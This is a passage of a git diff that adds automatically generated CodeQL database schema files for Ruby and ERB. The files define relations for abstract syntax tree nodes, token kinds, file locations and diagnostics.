+@ruby_if_alternative_type = @ruby_else | @ruby_elsif + +ruby_if_alternative( + unique int ruby_if: @ruby_if ref, + unique int alternative: @ruby_if_alternative_type ref +); + +ruby_if_consequence( + unique int ruby_if: @ruby_if ref, + unique int consequence: @ruby_then ref +); + +ruby_if_def( + unique int id: @ruby_if, + int condition: @ruby_underscore_statement ref +); + +ruby_if_guard_def( + unique int id: @ruby_if_guard, + int condition: @ruby_underscore_expression ref +); + +ruby_if_modifier_def( + unique int id: @ruby_if_modifier, + int body: @ruby_underscore_statement ref, + int condition: @ruby_underscore_expression ref +); + +ruby_in_def( + unique int id: @ruby_in, + int child: @ruby_underscore_arg ref +); + +ruby_in_clause_body( + unique int ruby_in_clause: @ruby_in_clause ref, + unique int body: @ruby_then ref +); + +@ruby_in_clause_guard_type = @ruby_if_guard | @ruby_unless_guard + +ruby_in_clause_guard( + unique int ruby_in_clause: @ruby_in_clause ref, + unique int guard: @ruby_in_clause_guard_type ref +); + +ruby_in_clause_def( + unique int id: @ruby_in_clause, + int pattern: @ruby_underscore_pattern_top_expr_body ref +); + +@ruby_interpolation_child_type = @ruby_token_empty_statement | @ruby_underscore_nonlocal_variable | @ruby_underscore_statement + +#keyset[ruby_interpolation, index] +ruby_interpolation_child( + int ruby_interpolation: @ruby_interpolation ref, + int index: int ref, + unique int child: @ruby_interpolation_child_type ref +); + +ruby_interpolation_def( + unique int id: @ruby_interpolation +); + +ruby_keyword_parameter_value( + unique int ruby_keyword_parameter: @ruby_keyword_parameter ref, + unique int value: @ruby_underscore_arg ref +); + +ruby_keyword_parameter_def( + unique int id: @ruby_keyword_parameter, + int name: @ruby_token_identifier ref +); + +@ruby_keyword_pattern_key_type = @ruby_string__ | @ruby_token_hash_key_symbol + +ruby_keyword_pattern_value( + unique int ruby_keyword_pattern: @ruby_keyword_pattern ref, + unique int value: @ruby_underscore_pattern_expr ref +); + +ruby_keyword_pattern_def( + unique int id: @ruby_keyword_pattern, + int key__: @ruby_keyword_pattern_key_type ref +); + +@ruby_lambda_body_type = @ruby_block | @ruby_do_block + +ruby_lambda_parameters( + unique int ruby_lambda: @ruby_lambda ref, + unique int parameters: @ruby_lambda_parameters ref +); + +ruby_lambda_def( + unique int id: @ruby_lambda, + int body: @ruby_lambda_body_type ref +); + +@ruby_lambda_parameters_child_type = @ruby_block_parameter | @ruby_destructured_parameter | @ruby_hash_splat_parameter | @ruby_keyword_parameter | @ruby_optional_parameter | @ruby_splat_parameter | @ruby_token_forward_parameter | @ruby_token_hash_splat_nil | @ruby_token_identifier + +#keyset[ruby_lambda_parameters, index] +ruby_lambda_parameters_child( + int ruby_lambda_parameters: @ruby_lambda_parameters ref, + int index: int ref, + unique int child: @ruby_lambda_parameters_child_type ref +); + +ruby_lambda_parameters_def( + unique int id: @ruby_lambda_parameters +); + +@ruby_left_assignment_list_child_type = @ruby_destructured_left_assignment | @ruby_rest_assignment | @ruby_underscore_lhs + +#keyset[ruby_left_assignment_list, index] +ruby_left_assignment_list_child( + int ruby_left_assignment_list: @ruby_left_assignment_list ref, + int index: int ref, + unique int child: @ruby_left_assignment_list_child_type ref +); + +ruby_left_assignment_list_def( + unique int id: @ruby_left_assignment_list +); + +@ruby_method_body_type = @ruby_body_statement | @ruby_rescue_modifier | @ruby_underscore_arg + +ruby_method_body( + unique int ruby_method: @ruby_method ref, + unique int body: @ruby_method_body_type ref +); + +ruby_method_parameters( + unique int ruby_method: @ruby_method ref, + unique int parameters: @ruby_method_parameters ref +); + +ruby_method_def( + unique int id: @ruby_method, + int name: @ruby_underscore_method_name ref +); + +@ruby_method_parameters_child_type = @ruby_block_parameter | @ruby_destructured_parameter | @ruby_hash_splat_parameter | @ruby_keyword_parameter | @ruby_optional_parameter | @ruby_splat_parameter | @ruby_token_forward_parameter | @ruby_token_hash_splat_nil | @ruby_token_identifier + +#keyset[ruby_method_parameters, index] +ruby_method_parameters_child( + int ruby_method_parameters: @ruby_method_parameters ref, + int index: int ref, + unique int child: @ruby_method_parameters_child_type ref +); + +ruby_method_parameters_def( + unique int id: @ruby_method_parameters +); + +ruby_module_body( + unique int ruby_module: @ruby_module ref, + unique int body: @ruby_body_statement ref +); + +@ruby_module_name_type = @ruby_scope_resolution | @ruby_token_constant + +ruby_module_def( + unique int id: @ruby_module, + int name: @ruby_module_name_type ref +); + +ruby_next_child( + unique int ruby_next: @ruby_next ref, + unique int child: @ruby_argument_list ref +); + +ruby_next_def( + unique int id: @ruby_next +); + +case @ruby_operator_assignment.operator of + 0 = @ruby_operator_assignment_percentequal +| 1 = @ruby_operator_assignment_ampersandampersandequal +| 2 = @ruby_operator_assignment_ampersandequal +| 3 = @ruby_operator_assignment_starstarequal +| 4 = @ruby_operator_assignment_starequal +| 5 = @ruby_operator_assignment_plusequal +| 6 = @ruby_operator_assignment_minusequal +| 7 = @ruby_operator_assignment_slashequal +| 8 = @ruby_operator_assignment_langlelangleequal +| 9 = @ruby_operator_assignment_ranglerangleequal +| 10 = @ruby_operator_assignment_caretequal +| 11 = @ruby_operator_assignment_pipeequal +| 12 = @ruby_operator_assignment_pipepipeequal +; + + +@ruby_operator_assignment_right_type = @ruby_rescue_modifier | @ruby_underscore_expression + +ruby_operator_assignment_def( + unique int id: @ruby_operator_assignment, + int left: @ruby_underscore_lhs ref, + int operator: int ref, + int right: @ruby_operator_assignment_right_type ref +); + +ruby_optional_parameter_def( + unique int id: @ruby_optional_parameter, + int name: @ruby_token_identifier ref, + int value: @ruby_underscore_arg ref +); + +@ruby_pair_key_type = @ruby_string__ | @ruby_token_hash_key_symbol | @ruby_underscore_arg + +ruby_pair_value( + unique int ruby_pair: @ruby_pair ref, + unique int value: @ruby_underscore_arg ref +); + +ruby_pair_def( + unique int id: @ruby_pair, + int key__: @ruby_pair_key_type ref +); + +ruby_parenthesized_pattern_def( + unique int id: @ruby_parenthesized_pattern, + int child: @ruby_underscore_pattern_expr ref +); + +@ruby_parenthesized_statements_child_type = @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_parenthesized_statements, index] +ruby_parenthesized_statements_child( + int ruby_parenthesized_statements: @ruby_parenthesized_statements ref, + int index: int ref, + unique int child: @ruby_parenthesized_statements_child_type ref +); + +ruby_parenthesized_statements_def( + unique int id: @ruby_parenthesized_statements +); + +@ruby_pattern_child_type = @ruby_splat_argument | @ruby_underscore_arg + +ruby_pattern_def( + unique int id: @ruby_pattern, + int child: @ruby_pattern_child_type ref +); + +@ruby_program_child_type = @ruby_token_empty_statement | @ruby_token_uninterpreted | @ruby_underscore_statement + +#keyset[ruby_program, index] +ruby_program_child( + int ruby_program: @ruby_program ref, + int index: int ref, + unique int child: @ruby_program_child_type ref +); + +ruby_program_def( + unique int id: @ruby_program +); + +@ruby_range_begin_type = @ruby_underscore_arg | @ruby_underscore_pattern_primitive + +ruby_range_begin( + unique int ruby_range: @ruby_range ref, + unique int begin: @ruby_range_begin_type ref +); + +@ruby_range_end_type = @ruby_underscore_arg | @ruby_underscore_pattern_primitive + +ruby_range_end( + unique int ruby_range: @ruby_range ref, + unique int end: @ruby_range_end_type ref +); + +case @ruby_range.operator of + 0 = @ruby_range_dotdot +| 1 = @ruby_range_dotdotdot +; + + +ruby_range_def( + unique int id: @ruby_range, + int operator: int ref +); + +@ruby_rational_child_type = @ruby_token_float | @ruby_token_integer + +ruby_rational_def( + unique int id: @ruby_rational, + int child: @ruby_rational_child_type ref +); + +ruby_redo_child( + unique int ruby_redo: @ruby_redo ref, + unique int child: @ruby_argument_list ref +); + +ruby_redo_def( + unique int id: @ruby_redo +); + +@ruby_regex_child_type = @ruby_interpolation | @ruby_token_escape_sequence | @ruby_token_string_content + +#keyset[ruby_regex, index] +ruby_regex_child( + int ruby_regex: @ruby_regex ref, + int index: int ref, + unique int child: @ruby_regex_child_type ref +); + +ruby_regex_def( + unique int id: @ruby_regex +); + +ruby_rescue_body( + unique int ruby_rescue: @ruby_rescue ref, + unique int body: @ruby_then ref +); + +ruby_rescue_exceptions( + unique int ruby_rescue: @ruby_rescue ref, + unique int exceptions: @ruby_exceptions ref +); + +ruby_rescue_variable( + unique int ruby_rescue: @ruby_rescue ref, + unique int variable: @ruby_exception_variable ref +); + +ruby_rescue_def( + unique int id: @ruby_rescue +); + +@ruby_rescue_modifier_body_type = @ruby_underscore_arg | @ruby_underscore_statement + +ruby_rescue_modifier_def( + unique int id: @ruby_rescue_modifier, + int body: @ruby_rescue_modifier_body_type ref, + int handler: @ruby_underscore_expression ref +); + +ruby_rest_assignment_child( + unique int ruby_rest_assignment: @ruby_rest_assignment ref, + unique int child: @ruby_underscore_lhs ref +); + +ruby_rest_assignment_def( + unique int id: @ruby_rest_assignment +); + +ruby_retry_child( + unique int ruby_retry: @ruby_retry ref, + unique int child: @ruby_argument_list ref +); + +ruby_retry_def( + unique int id: @ruby_retry +); + +ruby_return_child( + unique int ruby_return: @ruby_return ref, + unique int child: @ruby_argument_list ref +); + +ruby_return_def( + unique int id: @ruby_return +); + +@ruby_right_assignment_list_child_type = @ruby_splat_argument | @ruby_underscore_arg + +#keyset[ruby_right_assignment_list, index] +ruby_right_assignment_list_child( + int ruby_right_assignment_list: @ruby_right_assignment_list ref, + int index: int ref, + unique int child: @ruby_right_assignment_list_child_type ref +); + +ruby_right_assignment_list_def( + unique int id: @ruby_right_assignment_list +); + +@ruby_scope_resolution_scope_type = @ruby_underscore_pattern_constant | @ruby_underscore_primary + +ruby_scope_resolution_scope( + unique int ruby_scope_resolution: @ruby_scope_resolution ref, + unique int scope: @ruby_scope_resolution_scope_type ref +); + +ruby_scope_resolution_def( + unique int id: @ruby_scope_resolution, + int name: @ruby_token_constant ref +); + +ruby_setter_def( + unique int id: @ruby_setter, + int name: @ruby_token_identifier ref +); + +ruby_singleton_class_body( + unique int ruby_singleton_class: @ruby_singleton_class ref, + unique int body: @ruby_body_statement ref +); + +ruby_singleton_class_def( + unique int id: @ruby_singleton_class, + int value: @ruby_underscore_arg ref +); + +@ruby_singleton_method_body_type = @ruby_body_statement | @ruby_rescue_modifier | @ruby_underscore_arg + +ruby_singleton_method_body( + unique int ruby_singleton_method: @ruby_singleton_method ref, + unique int body: @ruby_singleton_method_body_type ref +); + +@ruby_singleton_method_object_type = @ruby_underscore_arg | @ruby_underscore_variable + +ruby_singleton_method_parameters( + unique int ruby_singleton_method: @ruby_singleton_method ref, + unique int parameters: @ruby_method_parameters ref +); + +ruby_singleton_method_def( + unique int id: @ruby_singleton_method, + int name: @ruby_underscore_method_name ref, + int object: @ruby_singleton_method_object_type ref +); + +ruby_splat_argument_child( + unique int ruby_splat_argument: @ruby_splat_argument ref, + unique int child: @ruby_underscore_arg ref +); + +ruby_splat_argument_def( + unique int id: @ruby_splat_argument +); + +ruby_splat_parameter_name( + unique int ruby_splat_parameter: @ruby_splat_parameter ref, + unique int name: @ruby_token_identifier ref +); + +ruby_splat_parameter_def( + unique int id: @ruby_splat_parameter +); + +@ruby_string_child_type = @ruby_interpolation | @ruby_token_escape_sequence | @ruby_token_string_content + +#keyset[ruby_string__, index] +ruby_string_child( + int ruby_string__: @ruby_string__ ref, + int index: int ref, + unique int child: @ruby_string_child_type ref +); + +ruby_string_def( + unique int id: @ruby_string__ +); + +#keyset[ruby_string_array, index] +ruby_string_array_child( + int ruby_string_array: @ruby_string_array ref, + int index: int ref, + unique int child: @ruby_bare_string ref +); + +ruby_string_array_def( + unique int id: @ruby_string_array +); + +@ruby_subshell_child_type = @ruby_interpolation | @ruby_token_escape_sequence | @ruby_token_string_content + +#keyset[ruby_subshell, index] +ruby_subshell_child( + int ruby_subshell: @ruby_subshell ref, + int index: int ref, + unique int child: @ruby_subshell_child_type ref +); + +ruby_subshell_def( + unique int id: @ruby_subshell +); + +ruby_superclass_def( + unique int id: @ruby_superclass, + int child: @ruby_underscore_expression ref +); + +#keyset[ruby_symbol_array, index] +ruby_symbol_array_child( + int ruby_symbol_array: @ruby_symbol_array ref, + int index: int ref, + unique int child: @ruby_bare_symbol ref +); + +ruby_symbol_array_def( + unique int id: @ruby_symbol_array +); + +@ruby_then_child_type = @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_then, index] +ruby_then_child( + int ruby_then: @ruby_then ref, + int index: int ref, + unique int child: @ruby_then_child_type ref +); + +ruby_then_def( + unique int id: @ruby_then +); + +@ruby_unary_operand_type = @ruby_parenthesized_statements | @ruby_underscore_expression | @ruby_underscore_simple_numeric + +case @ruby_unary.operator of + 0 = @ruby_unary_bang +| 1 = @ruby_unary_plus +| 2 = @ruby_unary_minus +| 3 = @ruby_unary_definedquestion +| 4 = @ruby_unary_not +| 5 = @ruby_unary_tilde +; + + +ruby_unary_def( + unique int id: @ruby_unary, + int operand: @ruby_unary_operand_type ref, + int operator: int ref +); + +#keyset[ruby_undef, index] +ruby_undef_child( + int ruby_undef: @ruby_undef ref, + int index: int ref, + unique int child: @ruby_underscore_method_name ref +); + +ruby_undef_def( + unique int id: @ruby_undef +); + +@ruby_unless_alternative_type = @ruby_else | @ruby_elsif + +ruby_unless_alternative( + unique int ruby_unless: @ruby_unless ref, + unique int alternative: @ruby_unless_alternative_type ref +); + +ruby_unless_consequence( + unique int ruby_unless: @ruby_unless ref, + unique int consequence: @ruby_then ref +); + +ruby_unless_def( + unique int id: @ruby_unless, + int condition: @ruby_underscore_statement ref +); + +ruby_unless_guard_def( + unique int id: @ruby_unless_guard, + int condition: @ruby_underscore_expression ref +); + +ruby_unless_modifier_def( + unique int id: @ruby_unless_modifier, + int body: @ruby_underscore_statement ref, + int condition: @ruby_underscore_expression ref +); + +ruby_until_def( + unique int id: @ruby_until, + int body: @ruby_do ref, + int condition: @ruby_underscore_statement ref +); + +ruby_until_modifier_def( + unique int id: @ruby_until_modifier, + int body: @ruby_underscore_statement ref, + int condition: @ruby_underscore_expression ref +); + +@ruby_variable_reference_pattern_name_type = @ruby_token_identifier | @ruby_underscore_nonlocal_variable + +ruby_variable_reference_pattern_def( + unique int id: @ruby_variable_reference_pattern, + int name: @ruby_variable_reference_pattern_name_type ref +); + +ruby_when_body( + unique int ruby_when: @ruby_when ref, + unique int body: @ruby_then ref +); + +#keyset[ruby_when, index] +ruby_when_pattern( + int ruby_when: @ruby_when ref, + int index: int ref, + unique int pattern: @ruby_pattern ref +); + +ruby_when_def( + unique int id: @ruby_when +); + +ruby_while_def( + unique int id: @ruby_while, + int body: @ruby_do ref, + int condition: @ruby_underscore_statement ref +); + +ruby_while_modifier_def( + unique int id: @ruby_while_modifier, + int body: @ruby_underscore_statement ref, + int condition: @ruby_underscore_expression ref +); + +ruby_yield_child( + unique int ruby_yield: @ruby_yield ref, + unique int child: @ruby_argument_list ref +); + +ruby_yield_def( + unique int id: @ruby_yield +); + +ruby_tokeninfo( + unique int id: @ruby_token, + int kind: int ref, + string value: string ref +); + +case @ruby_token.kind of + 0 = @ruby_reserved_word +| 1 = @ruby_token_character +| 2 = @ruby_token_class_variable +| 3 = @ruby_token_comment +| 4 = @ruby_token_constant +| 5 = @ruby_token_empty_statement +| 6 = @ruby_token_encoding +| 7 = @ruby_token_escape_sequence +| 8 = @ruby_token_false +| 9 = @ruby_token_file +| 10 = @ruby_token_float +| 11 = @ruby_token_forward_argument +| 12 = @ruby_token_forward_parameter +| 13 = @ruby_token_global_variable +| 14 = @ruby_token_hash_key_symbol +| 15 = @ruby_token_hash_splat_nil +| 16 = @ruby_token_heredoc_beginning +| 17 = @ruby_token_heredoc_content +| 18 = @ruby_token_heredoc_end +| 19 = @ruby_token_identifier +| 20 = @ruby_token_instance_variable +| 21 = @ruby_token_integer +| 22 = @ruby_token_line +| 23 = @ruby_token_nil +| 24 = @ruby_token_operator +| 25 = @ruby_token_self +| 26 = @ruby_token_simple_symbol +| 27 = @ruby_token_string_content +| 28 = @ruby_token_super +| 29 = @ruby_token_true +| 30 = @ruby_token_uninterpreted +; + + +@ruby_ast_node = @ruby_alias | @ruby_alternative_pattern | @ruby_argument_list | @ruby_array | @ruby_array_pattern | @ruby_as_pattern | @ruby_assignment | @ruby_bare_string | @ruby_bare_symbol | @ruby_begin | @ruby_begin_block | @ruby_binary | @ruby_block | @ruby_block_argument | @ruby_block_body | @ruby_block_parameter | @ruby_block_parameters | @ruby_body_statement | @ruby_break | @ruby_call | @ruby_case__ | @ruby_case_match | @ruby_chained_string | @ruby_class | @ruby_complex | @ruby_conditional | @ruby_delimited_symbol | @ruby_destructured_left_assignment | @ruby_destructured_parameter | @ruby_do | @ruby_do_block | @ruby_element_reference | @ruby_else | @ruby_elsif | @ruby_end_block | @ruby_ensure | @ruby_exception_variable | @ruby_exceptions | @ruby_expression_reference_pattern | @ruby_find_pattern | @ruby_for | @ruby_hash | @ruby_hash_pattern | @ruby_hash_splat_argument | @ruby_hash_splat_parameter | @ruby_heredoc_body | @ruby_if | @ruby_if_guard | @ruby_if_modifier | @ruby_in | @ruby_in_clause | @ruby_interpolation | @ruby_keyword_parameter | @ruby_keyword_pattern | @ruby_lambda | @ruby_lambda_parameters | @ruby_left_assignment_list | @ruby_method | @ruby_method_parameters | @ruby_module | @ruby_next | @ruby_operator_assignment | @ruby_optional_parameter | @ruby_pair | @ruby_parenthesized_pattern | @ruby_parenthesized_statements | @ruby_pattern | @ruby_program | @ruby_range | @ruby_rational | @ruby_redo | @ruby_regex | @ruby_rescue | @ruby_rescue_modifier | @ruby_rest_assignment | @ruby_retry | @ruby_return | @ruby_right_assignment_list | @ruby_scope_resolution | @ruby_setter | @ruby_singleton_class | @ruby_singleton_method | @ruby_splat_argument | @ruby_splat_parameter | @ruby_string__ | @ruby_string_array | @ruby_subshell | @ruby_superclass | @ruby_symbol_array | @ruby_then | @ruby_token | @ruby_unary | @ruby_undef | @ruby_unless | @ruby_unless_guard | @ruby_unless_modifier | @ruby_until | @ruby_until_modifier | @ruby_variable_reference_pattern | @ruby_when | @ruby_while | @ruby_while_modifier | @ruby_yield + +@ruby_ast_node_parent = @file | @ruby_ast_node + +#keyset[parent, parent_index] +ruby_ast_node_info( + unique int node: @ruby_ast_node ref, + int parent: @ruby_ast_node_parent ref, + int parent_index: int ref, + int loc: @location ref +); + +erb_comment_directive_child( + unique int erb_comment_directive: @erb_comment_directive ref, + unique int child: @erb_token_comment ref +); + +erb_comment_directive_def( + unique int id: @erb_comment_directive +); + +erb_directive_child( + unique int erb_directive: @erb_directive ref, + unique int child: @erb_token_code ref +); + +erb_directive_def( + unique int id: @erb_directive +); + +erb_graphql_directive_child( + unique int erb_graphql_directive: @erb_graphql_directive ref, + unique int child: @erb_token_code ref +); + +erb_graphql_directive_def( + unique int id: @erb_graphql_directive +); + +erb_output_directive_child( + unique int erb_output_directive: @erb_output_directive ref, + unique int child: @erb_token_code ref +); + +erb_output_directive_def( + unique int id: @erb_output_directive +); + +@erb_template_child_type = @erb_comment_directive | @erb_directive | @erb_graphql_directive | @erb_output_directive | @erb_token_content + +#keyset[erb_template, index] +erb_template_child( + int erb_template: @erb_template ref, + int index: int ref, + unique int child: @erb_template_child_type ref +); + +erb_template_def( + unique int id: @erb_template +); + +erb_tokeninfo( + unique int id: @erb_token, + int kind: int ref, + string value: string ref +); + +case @erb_token.kind of + 0 = @erb_reserved_word +| 1 = @erb_token_code +| 2 = @erb_token_comment +| 3 = @erb_token_content +; + + +@erb_ast_node = @erb_comment_directive | @erb_directive | @erb_graphql_directive | @erb_output_directive | @erb_template | @erb_token + +@erb_ast_node_parent = @erb_ast_node | @file + +#keyset[parent, parent_index] +erb_ast_node_info( + unique int node: @erb_ast_node ref, + int parent: @erb_ast_node_parent ref, + int parent_index: int ref, + int loc: @location ref +); + diff --git a/ruby/downgrades/307ebf14d59930ba903d71d377f6f4129d0a6d22/ruby.dbscheme b/ruby/downgrades/307ebf14d59930ba903d71d377f6f4129d0a6d22/ruby.dbscheme new file mode 100644 index 00000000000..3595c826de6 --- /dev/null +++ b/ruby/downgrades/307ebf14d59930ba903d71d377f6f4129d0a6d22/ruby.dbscheme @@ -0,0 +1,1435 @@ +// CodeQL database schema for Ruby +// Automatically generated from the tree-sitter grammar; do not edit + +@location = @location_default + +locations_default( + unique int id: @location_default, + int file: @file ref, + int start_line: int ref, + int start_column: int ref, + int end_line: int ref, + int end_column: int ref +); + +files( + unique int id: @file, + string name: string ref +); + +folders( + unique int id: @folder, + string name: string ref +); + +@container = @file | @folder + +containerparent( + int parent: @container ref, + unique int child: @container ref +); + +sourceLocationPrefix( + string prefix: string ref +); + +diagnostics( + unique int id: @diagnostic, + int severity: int ref, + string error_tag: string ref, + string error_message: string ref, + string full_error_message: string ref, + int location: @location_default ref +); + +case @diagnostic.severity of + 10 = @diagnostic_debug +| 20 = @diagnostic_info +| 30 = @diagnostic_warning +| 40 = @diagnostic_error +; + + +@ruby_underscore_arg = @ruby_assignment | @ruby_binary | @ruby_conditional | @ruby_operator_assignment | @ruby_range | @ruby_unary | @ruby_underscore_primary + +@ruby_underscore_call_operator = @ruby_reserved_word + +@ruby_underscore_expression = @ruby_assignment | @ruby_binary | @ruby_break | @ruby_call | @ruby_next | @ruby_operator_assignment | @ruby_return | @ruby_unary | @ruby_underscore_arg | @ruby_yield + +@ruby_underscore_lhs = @ruby_call | @ruby_element_reference | @ruby_scope_resolution | @ruby_token_false | @ruby_token_nil | @ruby_token_true | @ruby_underscore_variable + +@ruby_underscore_method_name = @ruby_delimited_symbol | @ruby_setter | @ruby_token_constant | @ruby_token_identifier | @ruby_token_operator | @ruby_token_simple_symbol | @ruby_underscore_nonlocal_variable + +@ruby_underscore_nonlocal_variable = @ruby_token_class_variable | @ruby_token_global_variable | @ruby_token_instance_variable + +@ruby_underscore_pattern_constant = @ruby_scope_resolution | @ruby_token_constant + +@ruby_underscore_pattern_expr = @ruby_alternative_pattern | @ruby_as_pattern | @ruby_underscore_pattern_expr_basic + +@ruby_underscore_pattern_expr_basic = @ruby_array_pattern | @ruby_expression_reference_pattern | @ruby_find_pattern | @ruby_hash_pattern | @ruby_parenthesized_pattern | @ruby_range | @ruby_token_identifier | @ruby_underscore_pattern_constant | @ruby_underscore_pattern_primitive | @ruby_variable_reference_pattern + +@ruby_underscore_pattern_primitive = @ruby_delimited_symbol | @ruby_lambda | @ruby_regex | @ruby_string__ | @ruby_string_array | @ruby_subshell | @ruby_symbol_array | @ruby_token_encoding | @ruby_token_false | @ruby_token_file | @ruby_token_heredoc_beginning | @ruby_token_line | @ruby_token_nil | @ruby_token_self | @ruby_token_simple_symbol | @ruby_token_true | @ruby_unary | @ruby_underscore_simple_numeric + +@ruby_underscore_pattern_top_expr_body = @ruby_array_pattern | @ruby_find_pattern | @ruby_hash_pattern | @ruby_underscore_pattern_expr + +@ruby_underscore_primary = @ruby_array | @ruby_begin | @ruby_break | @ruby_call | @ruby_case__ | @ruby_case_match | @ruby_chained_string | @ruby_class | @ruby_delimited_symbol | @ruby_for | @ruby_hash | @ruby_if | @ruby_lambda | @ruby_method | @ruby_module | @ruby_next | @ruby_parenthesized_statements | @ruby_redo | @ruby_regex | @ruby_retry | @ruby_return | @ruby_singleton_class | @ruby_singleton_method | @ruby_string__ | @ruby_string_array | @ruby_subshell | @ruby_symbol_array | @ruby_token_character | @ruby_token_heredoc_beginning | @ruby_token_simple_symbol | @ruby_unary | @ruby_underscore_lhs | @ruby_underscore_simple_numeric | @ruby_unless | @ruby_until | @ruby_while | @ruby_yield + +@ruby_underscore_simple_numeric = @ruby_complex | @ruby_rational | @ruby_token_float | @ruby_token_integer + +@ruby_underscore_statement = @ruby_alias | @ruby_begin_block | @ruby_end_block | @ruby_if_modifier | @ruby_rescue_modifier | @ruby_undef | @ruby_underscore_expression | @ruby_unless_modifier | @ruby_until_modifier | @ruby_while_modifier + +@ruby_underscore_variable = @ruby_token_constant | @ruby_token_identifier | @ruby_token_self | @ruby_token_super | @ruby_underscore_nonlocal_variable + +ruby_alias_def( + unique int id: @ruby_alias, + int alias: @ruby_underscore_method_name ref, + int name: @ruby_underscore_method_name ref +); + +#keyset[ruby_alternative_pattern, index] +ruby_alternative_pattern_alternatives( + int ruby_alternative_pattern: @ruby_alternative_pattern ref, + int index: int ref, + unique int alternatives: @ruby_underscore_pattern_expr_basic ref +); + +ruby_alternative_pattern_def( + unique int id: @ruby_alternative_pattern +); + +@ruby_argument_list_child_type = @ruby_block_argument | @ruby_hash_splat_argument | @ruby_pair | @ruby_splat_argument | @ruby_token_forward_argument | @ruby_underscore_expression + +#keyset[ruby_argument_list, index] +ruby_argument_list_child( + int ruby_argument_list: @ruby_argument_list ref, + int index: int ref, + unique int child: @ruby_argument_list_child_type ref +); + +ruby_argument_list_def( + unique int id: @ruby_argument_list +); + +@ruby_array_child_type = @ruby_block_argument | @ruby_hash_splat_argument | @ruby_pair | @ruby_splat_argument | @ruby_token_forward_argument | @ruby_underscore_expression + +#keyset[ruby_array, index] +ruby_array_child( + int ruby_array: @ruby_array ref, + int index: int ref, + unique int child: @ruby_array_child_type ref +); + +ruby_array_def( + unique int id: @ruby_array +); + +ruby_array_pattern_class( + unique int ruby_array_pattern: @ruby_array_pattern ref, + unique int class: @ruby_underscore_pattern_constant ref +); + +@ruby_array_pattern_child_type = @ruby_splat_parameter | @ruby_underscore_pattern_expr + +#keyset[ruby_array_pattern, index] +ruby_array_pattern_child( + int ruby_array_pattern: @ruby_array_pattern ref, + int index: int ref, + unique int child: @ruby_array_pattern_child_type ref +); + +ruby_array_pattern_def( + unique int id: @ruby_array_pattern +); + +ruby_as_pattern_def( + unique int id: @ruby_as_pattern, + int name: @ruby_token_identifier ref, + int value: @ruby_underscore_pattern_expr ref +); + +@ruby_assignment_left_type = @ruby_left_assignment_list | @ruby_underscore_lhs + +@ruby_assignment_right_type = @ruby_rescue_modifier | @ruby_right_assignment_list | @ruby_splat_argument | @ruby_underscore_expression + +ruby_assignment_def( + unique int id: @ruby_assignment, + int left: @ruby_assignment_left_type ref, + int right: @ruby_assignment_right_type ref +); + +@ruby_bare_string_child_type = @ruby_interpolation | @ruby_token_escape_sequence | @ruby_token_string_content + +#keyset[ruby_bare_string, index] +ruby_bare_string_child( + int ruby_bare_string: @ruby_bare_string ref, + int index: int ref, + unique int child: @ruby_bare_string_child_type ref +); + +ruby_bare_string_def( + unique int id: @ruby_bare_string +); + +@ruby_bare_symbol_child_type = @ruby_interpolation | @ruby_token_escape_sequence | @ruby_token_string_content + +#keyset[ruby_bare_symbol, index] +ruby_bare_symbol_child( + int ruby_bare_symbol: @ruby_bare_symbol ref, + int index: int ref, + unique int child: @ruby_bare_symbol_child_type ref +); + +ruby_bare_symbol_def( + unique int id: @ruby_bare_symbol +); + +@ruby_begin_child_type = @ruby_else | @ruby_ensure | @ruby_rescue | @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_begin, index] +ruby_begin_child( + int ruby_begin: @ruby_begin ref, + int index: int ref, + unique int child: @ruby_begin_child_type ref +); + +ruby_begin_def( + unique int id: @ruby_begin +); + +@ruby_begin_block_child_type = @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_begin_block, index] +ruby_begin_block_child( + int ruby_begin_block: @ruby_begin_block ref, + int index: int ref, + unique int child: @ruby_begin_block_child_type ref +); + +ruby_begin_block_def( + unique int id: @ruby_begin_block +); + +@ruby_binary_left_type = @ruby_underscore_expression | @ruby_underscore_simple_numeric + +case @ruby_binary.operator of + 0 = @ruby_binary_bangequal +| 1 = @ruby_binary_bangtilde +| 2 = @ruby_binary_percent +| 3 = @ruby_binary_ampersand +| 4 = @ruby_binary_ampersandampersand +| 5 = @ruby_binary_star +| 6 = @ruby_binary_starstar +| 7 = @ruby_binary_plus +| 8 = @ruby_binary_minus +| 9 = @ruby_binary_slash +| 10 = @ruby_binary_langle +| 11 = @ruby_binary_langlelangle +| 12 = @ruby_binary_langleequal +| 13 = @ruby_binary_langleequalrangle +| 14 = @ruby_binary_equalequal +| 15 = @ruby_binary_equalequalequal +| 16 = @ruby_binary_equaltilde +| 17 = @ruby_binary_rangle +| 18 = @ruby_binary_rangleequal +| 19 = @ruby_binary_ranglerangle +| 20 = @ruby_binary_caret +| 21 = @ruby_binary_and +| 22 = @ruby_binary_or +| 23 = @ruby_binary_pipe +| 24 = @ruby_binary_pipepipe +; + + +ruby_binary_def( + unique int id: @ruby_binary, + int left: @ruby_binary_left_type ref, + int operator: int ref, + int right: @ruby_underscore_expression ref +); + +ruby_block_body( + unique int ruby_block: @ruby_block ref, + unique int body: @ruby_block_body ref +); + +ruby_block_parameters( + unique int ruby_block: @ruby_block ref, + unique int parameters: @ruby_block_parameters ref +); + +ruby_block_def( + unique int id: @ruby_block +); + +ruby_block_argument_child( + unique int ruby_block_argument: @ruby_block_argument ref, + unique int child: @ruby_underscore_arg ref +); + +ruby_block_argument_def( + unique int id: @ruby_block_argument +); + +@ruby_block_body_child_type = @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_block_body, index] +ruby_block_body_child( + int ruby_block_body: @ruby_block_body ref, + int index: int ref, + unique int child: @ruby_block_body_child_type ref +); + +ruby_block_body_def( + unique int id: @ruby_block_body +); + +ruby_block_parameter_name( + unique int ruby_block_parameter: @ruby_block_parameter ref, + unique int name: @ruby_token_identifier ref +); + +ruby_block_parameter_def( + unique int id: @ruby_block_parameter +); + +#keyset[ruby_block_parameters, index] +ruby_block_parameters_locals( + int ruby_block_parameters: @ruby_block_parameters ref, + int index: int ref, + unique int locals: @ruby_token_identifier ref +); + +@ruby_block_parameters_child_type = @ruby_block_parameter | @ruby_destructured_parameter | @ruby_hash_splat_parameter | @ruby_keyword_parameter | @ruby_optional_parameter | @ruby_splat_parameter | @ruby_token_forward_parameter | @ruby_token_hash_splat_nil | @ruby_token_identifier + +#keyset[ruby_block_parameters, index] 